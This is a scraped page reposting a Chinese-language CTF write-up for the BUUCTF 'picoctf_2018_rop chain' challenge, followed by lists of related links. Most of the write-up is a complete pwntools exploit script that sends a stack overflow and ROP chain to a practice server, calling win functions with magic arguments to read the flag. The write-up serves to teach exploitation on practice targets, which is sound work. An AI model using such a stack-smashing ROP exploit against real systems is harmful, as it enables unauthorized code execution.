Buuctf(pwn) picoctf_2018_rop chain 栈溢出 - Code World

Buuctf(pwn) picoctf_2018_rop chain 栈溢出

Others 2021-12-11 18:36:18 views: null

在这里插入图片描述
32位，开启了NX保护

利用思路

首先溢出后覆盖ret为function1函数地址，将win1赋值为1，之后跳转到function2的地址，a1是传入的参数，将a1传入即可满足条件去设置win2的值为1，之后去执行flag函数，if要满足的条件之前都设置好了，可以直接读出flag

from pwn import *
r = remote("node3.buuoj.cn", 26602)
win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B
payload = "a" * (0x18+4)
payload += p32(win_function1)
payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
r.sendlineafter("input> ", payload)
r.interactive()

在这里插入图片描述

在这里插入图片描述

Guess you like

Origin blog.csdn.net/weixin_45556441/article/details/119811316

Buuctf(pwn) picoctf_2018_rop chain 栈溢出

Buuctf(pwn) picoctf_2018_rop chain 栈溢出

BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

[BUUCTF]PWN——picoctf_2018_buffer overflow 0

[BUUCTF]PWN——picoctf_2018_are you root (program logic error)

[BUUCTF]PWN——suctf_2018_basic pwn

[BUUCTF]PWN——picoctf_2018_leak_me (puts'\x00' bypasses the output of sensitive data)

[BUUCTF]PWN——Guardian Cup_2018_gettingstart

BUUCTF (pwn) [HarekazeCTF2019] baby_rop

Delve into 64 rop chain structure, wp common universal gadgets Comments | Advanced offensive zone welpwn world pwn

BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

[BUUCTF]PWN——wdb2018_guess (stack smashing--canary error report utilization)

buuctf pwn （21~24）

buuctf pwn （17~20）

buuctf pwn（13~16）

[BUUCTF] PWN —— picoctf_2018_are you root (логическая ошибка программы)

BUUCTF PWN section entitled wp

buuctf --pwn part2

BUUCTF-PWN-cmcc_simplerop

42 单片机栈溢出及程序栈大小设定

Construction of ROP chain - to bypass DEP protection

[BUUCTF] PWN —— picoctf_2018_sind Sie root (Programmlogikfehler)

[BUUCTF] PWN —— picoctf_2018_leak_me (помещает '\ x00' в обход вывода конфиденциальных данных)

buuctf pwn wp --- part1

[BUUCTF] PWN —— bjdctf_2020_YDSneedGrirlfriend （UAF）

[BUUCTF]PWN——wustctf2020_number_game

BUUCTF (pwn) bjdctf_2020_babystack

Buuctf(pwn)ciscn_2019_n_8

[BUUCTF]PWN——ciscn_2019_final_2

Recommended

Arc Browser for Windows 1.0 officially GA

A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!

Ranking

1. Select Sort

Create a thread thread

3 press to play ball that reach 6

Programmation CUDA (4) : gestion de la mémoire

SpringBoot database connection pool Druid error

E Diudiu App redesign summary

4EVERLAND Hosting now supports SNS+IPFS

About HTTPS

[vue3+vite+ts+element-plu+sass] uses bug records in sass

Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling

Daily

More

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)